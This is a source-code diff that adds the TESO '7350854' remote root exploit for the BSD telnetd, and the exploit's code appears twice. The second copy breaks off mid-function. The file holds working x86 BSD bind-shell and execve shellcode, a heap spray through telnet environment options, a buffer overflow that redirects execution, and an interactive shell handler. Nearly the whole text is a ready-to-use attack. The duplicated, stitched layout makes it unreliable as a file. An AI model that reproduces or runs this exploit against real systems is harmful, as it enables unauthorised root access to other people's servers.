dest |= val << (8 - bw - len); /* set value bits */ \ + bw += len; \ +} + +/* imported from network.c */ +#define NET_CONNTIMEOUT 60 +int net_conntimeout = NET_CONNTIMEOUT; + +unsigned long int net_resolve (char *host); +int net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec); + + +/* x86/bsd PIC portshell shellcode + * by lorian/teso + * port 0x4444 (might want to change it here) + */ +unsigned char x86_bsd_portshell[] = + "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53" + "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5" + /* ^^ ^^ port */ + "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a" + "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a" + "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73" + "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd" + "\x80"; + +/* x86/bsd PIC execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_execvesh[] = + "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"; + +/* x86/bsd(i)+solaris execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_compaexec[] = + "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0" + "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b" + "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" + "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7"; + + +unsigned char * shellcode = x86_bsd_compaexec; + + +#define COL 55 + + +void +usage (char *progname) +{ + fprintf (stderr, "usage: %s [-n ] [-c] [-f] \n\n", progname); + fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n" + "-c\tcheck exploitability only, do not exploit\n" + "-f\tforce mode, override check results\n\n"); + fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n" + "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n" + "take that, or it will take very long for it (> 1h). 
beware.\n\n"); + + fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n" + "\tNetBSD 1.5\n" + "\tBSDI BSD/OS 4.1\n\n"); + + exit (EXIT_FAILURE); +} + +int +main (int argc, char *argv[]) +{ + char c; + char * progname; + char * dest; + int i, j, fd, + dots = 0; + int popc; + struct timeval start, + cur; + unsigned long long int g_pct, /* gaussian percentage */ + g_all; /* gaussian overall */ + + + fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n" + "by zip, lorian, smiler and scut.\n\n"); + + progname = argv[0]; + if (argc < 2) + usage (progname); + + + while ((c = getopt (argc, argv, "n:cf")) != EOF) { + switch (c) { + case 'n': + num = atoi (optarg); + break; + case 'c': + checkonly = 1; + break; + case 'f': + force = 1; + break; + default: + usage (progname); + break; + } + } + + dest = argv[argc - 1]; + if (dest[0] == '-') + usage (progname); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect\n"); + exit (EXIT_FAILURE); + } + + random_init (); + + if (xp_check (fd) == 0 && force == 0) { + printf ("aborting\n"); +#ifndef DEBUG + exit (EXIT_FAILURE); +#endif + } + close (fd); + + if (checkonly) + exit (EXIT_SUCCESS); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect the second time\n"); + exit (EXIT_FAILURE); + } + + printf ("\n#############################################################################\n\n"); + printf ("ok baby, times are rough, we send %dmb traffic to the remote\n" + "telnet daemon process, it will spill badly. 
but then, there is no\n" + "other way, sorry...\n\n", mode); + +#ifdef DEBUG + getchar (); +#endif + printf ("## setting populators to populate heap address space\n"); + + g_all = ((unsigned long long int)(pop / 2)) * + ((unsigned long long int)(pop + 1)); + g_pct = 0; + + printf ("## number of setenvs (dots / network): %d\n", pop); + printf ("## number of walks (percentage / cpu): %Lu\n", g_all); + printf ("##\n"); + printf ("## the percentage is more realistic than the dots ;)\n"); + printf ("\n"); + printf ("percent |"); + + popc = pop / COL; + for (i = pop / popc ; i >= 0 ; --i) + printf ("-"); + printf ("| ETA |\n"); + + gettimeofday (&start, NULL); + + for (walk = 0 ; walk < pop ; ++walk) { + xp_pop (fd); + + g_pct += walk; + + if (walk % popc == 0) + dots += 1; + + if (walk % 200 == 0) { + int pct; + float pct_f; + unsigned long int diff; + + pct = (int) ((g_pct * 100) / g_all); + pct_f = g_pct * 100; + pct_f /= (float) g_all; + + /* calculate difference not caring about accuracy */ + gettimeofday (&cur, NULL); + diff = cur.tv_sec - start.tv_sec; + + printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ? 
+ "\r %2.2f%% |" : "\r %1.2f%% |"), pct_f); + for (j = 0 ; j < dots ; ++j) + printf ("."); + for ( ; j <= COL ; ++j) + printf (" "); + + if (pct != 0) { + diff = (int) ((((float)(100 - pct_f)) / + (float) pct_f) * diff); + printf ("| %02lu:%02lu:%02lu |", + diff / 3600, (diff % 3600) / 60, + diff % 60); + } else { + printf ("| --:--:-- |"); + } + + fflush (stdout); + } + } + printf ("\n\n"); + + printf ("## sleeping for 10 seconds to let the process recover\n"); + sleep (10); + +#ifdef DEBUG + getchar (); +#endif + /* return into 0x08feff0a */ + xp (fd); + sleep (1); + + printf ("## ok, you should now have a root shell\n"); + printf ("## as always, after hard times, there is a reward...\n"); + printf ("\n\ncommand: "); + fflush (stdout); + + shell (fd); + + exit (EXIT_SUCCESS); +} + + +void +xp (int fd) +{ + int n; + unsigned char buf[2048]; + + + /* basic overflow */ + for (n = bs ; n < sizeof (buf) ; ++n) + buf[n] = (n - bs) % 2 ? '\xf6' : '\xff'; + + /* some nifty alignment */ + buf[0] = '\xff'; /* IAC */ + buf[1] = '\xf5'; /* AO */ + + if (mode == 16) { + buf[2] = '\xff'; /* IAC */ + buf[3] = '\xfb'; /* WILL */ + buf[4] = '\x26'; /* ENCRYPTION */ + } + + /* force 0x08feff0a as return */ + buf[num++] = '\xff'; + buf[num++] = '\xfb'; + buf[num++] = '\x08'; + + /* and the output_encrypt overwrite action, yay! */ + buf[num++] = '\xff'; + buf[num++] = '\xf6'; + + /* XXX: should not fail here, though we should better loop and check */ + n = send (fd, buf, num, 0); + if (n != num) { + perror ("xp:send"); + } +} + + +#ifdef INSANE_MIND + +void +xp_shrinkwin (int fd) +{ + int n; + int iobc; + int p = 0; + unsigned char buf[2048]; + char c; + int val; + int len; + + for (n = 0 ; n < sizeof (buf) ; ++n) + buf[n] = n % 2 ? '\xf6' : '\xff'; + + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + val = 1; + printf ("setsockopt: %s\n", + setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ? 
+ "FAILED" : "SUCCESS"); + val = 1234; + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + + getchar(); + while (1) { + if (p > 105) + c = getchar(); + if (c == 'r') { + getchar(); + read (fd, &buf[1024], 384); + } else if (c == 'o') { + getchar(); + send (fd, "7", 1, MSG_OOB); + } else if (c != 'r') { + usleep(100000); + n = send (fd, buf, 112, 0); + ioctl (fd, FIONREAD, &iobc); + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len); + printf ("%02d. send: %d local: %d/%d (%d left)\n", + ++p, n, iobc, val, val - iobc); + } + } +} +#endif + + +/* xp_pop - populator function + * + * causes remote telnet daemon to setenv() variables with our content, populating + * the heap with shellcode. this will get us more nopspace and place our shellcode + * where the nice addresses are, that we can create by writing telnet option + * strings. + * + * XXX: there seems to be a maximum size for the environment value you can set, + * which is 510. we use 496 bytes for nopspace and shellcode therefore. + * should work, rather similar to tsig tcp/malloc exploitation. 
-sc + */ + +void +xp_pop (int fd) +{ + unsigned char var[16]; + unsigned char storebuf[496]; + sprintf (var, "%06x", walk); +#ifdef DEBUG + memset (storebuf, '\xcc', sizeof (storebuf)); +#else +/* memset (storebuf, '\x90', sizeof (storebuf)); */ + x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5); + memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1, + shellcode, strlen (shellcode)); +#endif + storebuf[sizeof (storebuf) - 1] = '\0'; + + xp_setenv (fd, var, storebuf); +} + + +void +xp_setenv (int fd, unsigned char *var, unsigned char *val) +{ + int n = 0; + unsigned char buf[2048]; + + buf[n++] = IAC; + buf[n++] = SB; + buf[n++] = TELOPT_NEW_ENVIRON; + buf[n++] = TELQUAL_IS; + buf[n++] = ENV_USERVAR; + + /* should not contain < 0x04 */ + while (*var) { + if (*var == IAC) + buf[n++] = *var; + buf[n++] = *var++; + } + buf[n++] = NEW_ENV_VALUE; + while (*val) { + if (*val == IAC) + buf[n++] = *val; + buf[n++] = *val++; + } + buf[n++] = IAC; + buf[n++] = SE; + + if (send (fd, buf, n, 0) != n) { + perror ("xp_setenv:send"); + exit (EXIT_FAILURE); + } +} + + +int +xp_check (int fd) +{ + int n; + unsigned int expect_len = 15; + unsigned char expected[] = + "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26"; + /* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/ + unsigned int additional_len = 8; + unsigned char additional[] = + "\xff\xfa\x26\x01\x01\x02\xff\xf0"; + /*IAC SB ENC ........... 
IAC SE */ + + unsigned char buf[128]; + + read (fd, buf, sizeof (buf)); + + n = 0; + buf[n++] = IAC; /* 0xff */ + buf[n++] = AYT; /* 0xf6 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_NAOL; /* 0x08 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_ENCRYPT; /* 0x26 */ + +#ifdef DEBUG + hexdump ("check send buffer", buf, n); +#endif + if (send (fd, buf, n, 0) != n) { + perror ("xp_check:send"); + exit (EXIT_FAILURE); + } + + n = read (fd, buf, sizeof (buf)); +#ifdef DEBUG + hexdump ("check recv buffer", buf, n); +#endif + + if (memcmp (buf, expected, expect_len) == 0) { + if (memcmp (buf+expect_len, additional, additional_len) == 0) { + mode = 16; + } else { + mode = 34; + bs = bs34; + } + printf ("check: PASSED, using %dmb mode\n", mode); + + return (1); + } + + printf ("check: FAILED\n"); + + return (0); +} + + +void +shell (int sock) +{ + int l; + char buf[512]; + fd_set rfds; + + + while (1) { + FD_SET (0, &rfds); + FD_SET (sock, &rfds); + + select (sock + 1, &rfds, NULL, NULL, NULL); + if (FD_ISSET (0, &rfds)) { + l = read (0, buf, sizeof (buf)); + if (l <= 0) { + perror ("read user"); + exit (EXIT_FAILURE); + } + write (sock, buf, l); + } + + if (FD_ISSET (sock, &rfds)) { + l = read (sock, buf, sizeof (buf)); + if (l <= 0) { + perror ("read remote"); + exit (EXIT_FAILURE); + } + write (1, buf, l); + } + } +} + + +/* ripped from zodiac */ +void +hexdump (char *desc, unsigned char *data, unsigned int amount) +{ + unsigned int dp, p; /* data pointer */ + const char trans[] = + "................................ !\"#$%&'()*+,-./0123456789" + ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" + "nopqrstuvwxyz{|}~...................................." + "....................................................." 
+ "........................................"; + + + printf ("/* %s, %u bytes */\n", desc, amount); + + for (dp = 1; dp <= amount; dp++) { + fprintf (stderr, "%02x ", data[dp-1]); + if ((dp % 8) == 0) + fprintf (stderr, " "); + if ((dp % 16) == 0) { + fprintf (stderr, "| "); + p = dp; + for (dp -= 16; dp < p; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + fprintf (stderr, "\n"); + } + fflush (stderr); + } + if ((amount % 16) != 0) { + p = dp = 16 - (amount % 16); + for (dp = p; dp > 0; dp--) { + fprintf (stderr, " "); + if (((dp % 8) == 0) && (p != 8)) + fprintf (stderr, " "); + fflush (stderr); + } + fprintf (stderr, " | "); + for (dp = (amount - (16 - p)); dp < amount; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + } + fprintf (stderr, "\n"); + + return; +} + + + +unsigned long int +net_resolve (char *host) +{ + long i; + struct hostent *he; + + i = inet_addr(host); + if (i == -1) { + he = gethostbyname(host); + if (he == NULL) { + return (0); + } else { + return (*(unsigned long *) he->h_addr); + } + } + return (i); +} + + +int +net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec) +{ + int n, + len, + error, + flags; + int fd; + struct timeval tv; + fd_set rset, wset; + struct sockaddr_in csa; + + if (cs == NULL) + cs = &csa; + + /* first allocate a socket */ + cs->sin_family = AF_INET; + cs->sin_port = htons (port); + fd = socket (cs->sin_family, SOCK_STREAM, 0); + if (fd == -1) + return (-1); + + if (!(cs->sin_addr.s_addr = net_resolve (server))) { + close (fd); + return (-1); + } + + flags = fcntl (fd, F_GETFL, 0); + if (flags == -1) { + close (fd); + return (-1); + } + n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); + if (n == -1) { + close (fd); + return (-1); + } + + error = 0; + + n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); + if (n < 0) { + if (errno != EINPROGRESS) { + close (fd); + return (-1); + } + } + if (n == 0) + goto done; + + FD_ZERO(&rset); + 
FD_ZERO(&wset); + FD_SET(fd, &rset); + FD_SET(fd, &wset); + tv.tv_sec = sec; + tv.tv_usec = 0; + + n = select(fd + 1, &rset, &wset, NULL, &tv); + if (n == 0) { + close(fd); + errno = ETIMEDOUT; + return (-1); + } + if (n == -1) + return (-1); + + if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { + if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { + len = sizeof(error); + if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { + errno = ETIMEDOUT; + return (-1); + } + if (error == 0) { + goto done; + } else { + errno = error; + return (-1); + } + } + } else + return (-1); + +done: + n = fcntl(fd, F_SETFL, flags); + if (n == -1) + return (-1); + return (fd); +} + + +/* imported from shellkit */ + +unsigned long int +random_get (unsigned long int low, unsigned long int high) +{ + unsigned long int val; + + if (low > high) { + low ^= high; + high ^= low; + low ^= high; + } + + val = (unsigned long int) random (); + val %= (high - low); + val += low; + + return (val); +} + + +void +random_init (void) +{ + srandom (time (NULL)); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len) +{ + int n; + + for (code_len -= 1 ; code_len >= 0 ; --code_len) { + for (n = 0 ; n < bad_len ; ++n) + if (code[code_len] == bad[n]) + return (1); + } + + return (0); +} + +unsigned long int +x86_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 7); + } while (reg == 4); /* 4 = $esp */ + + return (reg); +} + + + +unsigned long int +x86_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned char tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 3, 
x86_nop_rwreg (), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 8) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "0011.0111", /* aaa */ + "0011.1111", /* aas */ + "1001.1000", /* cbw */ + "1001.1001", /* cdq */ + "1111.1000", /* clc */ + "1111.1100", /* cld */ + "1111.0101", /* cmc */ + "0010.0111", /* daa */ + "0010.1111", /* das */ + "0100.1r", /* dec */ + "0100.0r", /* inc */ + "1001.1111", /* lahf */ + "1001.0000", /* nop */ + "1111.1001", /* stc */ + "1111.1101", /* std */ + "1001.0r", /* xchg al, */ + NULL, + }; + unsigned char tgt; + + + for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 15)]; + tgt = x86_nop_xfer (xs); + + dest[walk] = tgt; + if (badstr (&dest[walk], 1, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + diff --git a/exploits/7350854/7350854.c b/exploits/7350854/7350854.c new file mode 100644 index 0000000..95dd740 --- /dev/null +++ b/exploits/7350854/7350854.c 
@@ -0,0 +1,877 @@ +/* 7350854 - x86/bsd telnetd remote root exploit + * + * TESO CONFIDENTIAL - SOURCE MATERIALS + * + * This is unpublished proprietary source code of TESO Security. + * + * The contents of these coded instructions, statements and computer + * programs may not be disclosed to third parties, copied or duplicated in + * any form, in whole or in part, without the prior written permission of + * TESO Security. This includes especially the Bugtraq mailing list, the + * www.hack.co.za website and any public exploit archive. + * + * (C) COPYRIGHT TESO Security, 2001 + * All Rights Reserved + * + ***************************************************************************** + * bug found by scut 2001/06/09 + * further research by smiler, zip, lorian and me. + * thanks to zip's cool friend for giving me a testbed to play on + * + * tested against: BSDI BSD/OS 4.1 + * NetBSD 1.5 + * FreeBSD 3.1 + * FreeBSD 4.0-REL + * FreeBSD 4.2-REL + * FreeBSD 4.3-BETA + * FreeBSD 4.3-STABLE + * FreeBSD 4.3-RELEASE + * + */ + +#define VERSION "0.0.7" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +/* global variables, uhhohh! 
+ */ +int mode = 16; +int num = 245; +int pop = 31500; /* puts code at 0x08fdff0a */ +int bs = 1; /* buffer start */ + +int num34 = 244; +int pop34 = 71833; /* puts code at 0x0a0d08fe */ +int bs34 = 0; + +int walk; /* populator walker */ +int force = 0; /* force exploitation */ +int checkonly = 0; /* check telnetd only */ + + +void usage (char *progname); +int xp_check (int fd); +void xp_pop (int fd); +void xp_shrinkwin (int fd); +void xp_setenv (int fd, unsigned char *var, unsigned char *val); +void xp (int fd); +void shell (int sock); +void hexdump (char *desc, unsigned char *data, unsigned int amount); + +/* imported from shellkit */ +unsigned long int random_get (unsigned long int low, unsigned long int high); +void random_init (void); +int bad (unsigned char u); +int badstr (unsigned char *code, int code_len, unsigned char *bad, + int bad_len); +unsigned long int x86_nop_rwreg (void); +unsigned long int x86_nop_xfer (char *xferstr); +unsigned int x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len); + +#define BSET(dest, len, val, bw) { \ + dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \ + dest |= val << (8 - bw - len); /* set value bits */ \ + bw += len; \ +} + +/* imported from network.c */ +#define NET_CONNTIMEOUT 60 +int net_conntimeout = NET_CONNTIMEOUT; + +unsigned long int net_resolve (char *host); +int net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec); + + +/* x86/bsd PIC portshell shellcode + * by lorian/teso + * port 0x4444 (might want to change it here) + */ +unsigned char x86_bsd_portshell[] = + "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53" + "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5" + /* ^^ ^^ port */ + "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a" + "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a" + "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73" + "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd" + "\x80"; + +/* x86/bsd PIC execve 
shellcode + * by lorian/teso + */ +unsigned char x86_bsd_execvesh[] = + "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68" + "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"; + +/* x86/bsd(i)+solaris execve shellcode + * by lorian/teso + */ +unsigned char x86_bsd_compaexec[] = + "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0" + "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b" + "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" + "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7"; + + +unsigned char * shellcode = x86_bsd_compaexec; + + +#define COL 55 + + +void +usage (char *progname) +{ + fprintf (stderr, "usage: %s [-n ] [-c] [-f] \n\n", progname); + fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n" + "-c\tcheck exploitability only, do not exploit\n" + "-f\tforce mode, override check results\n\n"); + fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n" + "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n" + "take that, or it will take very long for it (> 1h). 
beware.\n\n"); + + fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n" + "\tNetBSD 1.5\n" + "\tBSDI BSD/OS 4.1\n\n"); + + exit (EXIT_FAILURE); +} + +int +main (int argc, char *argv[]) +{ + char c; + char * progname; + char * dest; + int i, j, fd, + dots = 0; + int popc; + struct timeval start, + cur; + unsigned long long int g_pct, /* gaussian percentage */ + g_all; /* gaussian overall */ + + + fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n" + "by zip, lorian, smiler and scut.\n\n"); + + progname = argv[0]; + if (argc < 2) + usage (progname); + + + while ((c = getopt (argc, argv, "n:cf")) != EOF) { + switch (c) { + case 'n': + num = atoi (optarg); + break; + case 'c': + checkonly = 1; + break; + case 'f': + force = 1; + break; + default: + usage (progname); + break; + } + } + + dest = argv[argc - 1]; + if (dest[0] == '-') + usage (progname); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect\n"); + exit (EXIT_FAILURE); + } + + random_init (); + + if (xp_check (fd) == 0 && force == 0) { + printf ("aborting\n"); +#ifndef DEBUG + exit (EXIT_FAILURE); +#endif + } + close (fd); + + if (checkonly) + exit (EXIT_SUCCESS); + + fd = net_connect (NULL, dest, 23, 20); + if (fd <= 0) { + fprintf (stderr, "failed to connect the second time\n"); + exit (EXIT_FAILURE); + } + + printf ("\n#############################################################################\n\n"); + printf ("ok baby, times are rough, we send %dmb traffic to the remote\n" + "telnet daemon process, it will spill badly. 
but then, there is no\n" + "other way, sorry...\n\n", mode); + +#ifdef DEBUG + getchar (); +#endif + printf ("## setting populators to populate heap address space\n"); + + g_all = ((unsigned long long int)(pop / 2)) * + ((unsigned long long int)(pop + 1)); + g_pct = 0; + + printf ("## number of setenvs (dots / network): %d\n", pop); + printf ("## number of walks (percentage / cpu): %Lu\n", g_all); + printf ("##\n"); + printf ("## the percentage is more realistic than the dots ;)\n"); + printf ("\n"); + printf ("percent |"); + + popc = pop / COL; + for (i = pop / popc ; i >= 0 ; --i) + printf ("-"); + printf ("| ETA |\n"); + + gettimeofday (&start, NULL); + + for (walk = 0 ; walk < pop ; ++walk) { + xp_pop (fd); + + g_pct += walk; + + if (walk % popc == 0) + dots += 1; + + if (walk % 200 == 0) { + int pct; + float pct_f; + unsigned long int diff; + + pct = (int) ((g_pct * 100) / g_all); + pct_f = g_pct * 100; + pct_f /= (float) g_all; + + /* calculate difference not caring about accuracy */ + gettimeofday (&cur, NULL); + diff = cur.tv_sec - start.tv_sec; + + printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ? 
+ "\r %2.2f%% |" : "\r %1.2f%% |"), pct_f); + for (j = 0 ; j < dots ; ++j) + printf ("."); + for ( ; j <= COL ; ++j) + printf (" "); + + if (pct != 0) { + diff = (int) ((((float)(100 - pct_f)) / + (float) pct_f) * diff); + printf ("| %02lu:%02lu:%02lu |", + diff / 3600, (diff % 3600) / 60, + diff % 60); + } else { + printf ("| --:--:-- |"); + } + + fflush (stdout); + } + } + printf ("\n\n"); + + printf ("## sleeping for 10 seconds to let the process recover\n"); + sleep (10); + +#ifdef DEBUG + getchar (); +#endif + /* return into 0x08feff0a */ + xp (fd); + sleep (1); + + printf ("## ok, you should now have a root shell\n"); + printf ("## as always, after hard times, there is a reward...\n"); + printf ("\n\ncommand: "); + fflush (stdout); + + shell (fd); + + exit (EXIT_SUCCESS); +} + + +void +xp (int fd) +{ + int n; + unsigned char buf[2048]; + + + /* basic overflow */ + for (n = bs ; n < sizeof (buf) ; ++n) + buf[n] = (n - bs) % 2 ? '\xf6' : '\xff'; + + /* some nifty alignment */ + buf[0] = '\xff'; /* IAC */ + buf[1] = '\xf5'; /* AO */ + + if (mode == 16) { + buf[2] = '\xff'; /* IAC */ + buf[3] = '\xfb'; /* WILL */ + buf[4] = '\x26'; /* ENCRYPTION */ + } + + /* force 0x08feff0a as return */ + buf[num++] = '\xff'; + buf[num++] = '\xfb'; + buf[num++] = '\x08'; + + /* and the output_encrypt overwrite action, yay! */ + buf[num++] = '\xff'; + buf[num++] = '\xf6'; + + /* XXX: should not fail here, though we should better loop and check */ + n = send (fd, buf, num, 0); + if (n != num) { + perror ("xp:send"); + } +} + + +#ifdef INSANE_MIND + +void +xp_shrinkwin (int fd) +{ + int n; + int iobc; + int p = 0; + unsigned char buf[2048]; + char c; + int val; + int len; + + for (n = 0 ; n < sizeof (buf) ; ++n) + buf[n] = n % 2 ? '\xf6' : '\xff'; + + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + val = 1; + printf ("setsockopt: %s\n", + setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ? 
+ "FAILED" : "SUCCESS"); + val = 1234; + getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len); + printf ("SO_SNDLOWAT = %d\n", val); + + getchar(); + while (1) { + if (p > 105) + c = getchar(); + if (c == 'r') { + getchar(); + read (fd, &buf[1024], 384); + } else if (c == 'o') { + getchar(); + send (fd, "7", 1, MSG_OOB); + } else if (c != 'r') { + usleep(100000); + n = send (fd, buf, 112, 0); + ioctl (fd, FIONREAD, &iobc); + len = sizeof (val); + getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len); + printf ("%02d. send: %d local: %d/%d (%d left)\n", + ++p, n, iobc, val, val - iobc); + } + } +} +#endif + + +/* xp_pop - populator function + * + * causes remote telnet daemon to setenv() variables with our content, populating + * the heap with shellcode. this will get us more nopspace and place our shellcode + * where the nice addresses are, that we can create by writing telnet option + * strings. + * + * XXX: there seems to be a maximum size for the environment value you can set, + * which is 510. we use 496 bytes for nopspace and shellcode therefore. + * should work, rather similar to tsig tcp/malloc exploitation. 
-sc + */ + +void +xp_pop (int fd) +{ + unsigned char var[16]; + unsigned char storebuf[496]; + sprintf (var, "%06x", walk); +#ifdef DEBUG + memset (storebuf, '\xcc', sizeof (storebuf)); +#else +/* memset (storebuf, '\x90', sizeof (storebuf)); */ + x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5); + memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1, + shellcode, strlen (shellcode)); +#endif + storebuf[sizeof (storebuf) - 1] = '\0'; + + xp_setenv (fd, var, storebuf); +} + + +void +xp_setenv (int fd, unsigned char *var, unsigned char *val) +{ + int n = 0; + unsigned char buf[2048]; + + buf[n++] = IAC; + buf[n++] = SB; + buf[n++] = TELOPT_NEW_ENVIRON; + buf[n++] = TELQUAL_IS; + buf[n++] = ENV_USERVAR; + + /* should not contain < 0x04 */ + while (*var) { + if (*var == IAC) + buf[n++] = *var; + buf[n++] = *var++; + } + buf[n++] = NEW_ENV_VALUE; + while (*val) { + if (*val == IAC) + buf[n++] = *val; + buf[n++] = *val++; + } + buf[n++] = IAC; + buf[n++] = SE; + + if (send (fd, buf, n, 0) != n) { + perror ("xp_setenv:send"); + exit (EXIT_FAILURE); + } +} + + +int +xp_check (int fd) +{ + int n; + unsigned int expect_len = 15; + unsigned char expected[] = + "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26"; + /* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/ + unsigned int additional_len = 8; + unsigned char additional[] = + "\xff\xfa\x26\x01\x01\x02\xff\xf0"; + /*IAC SB ENC ........... 
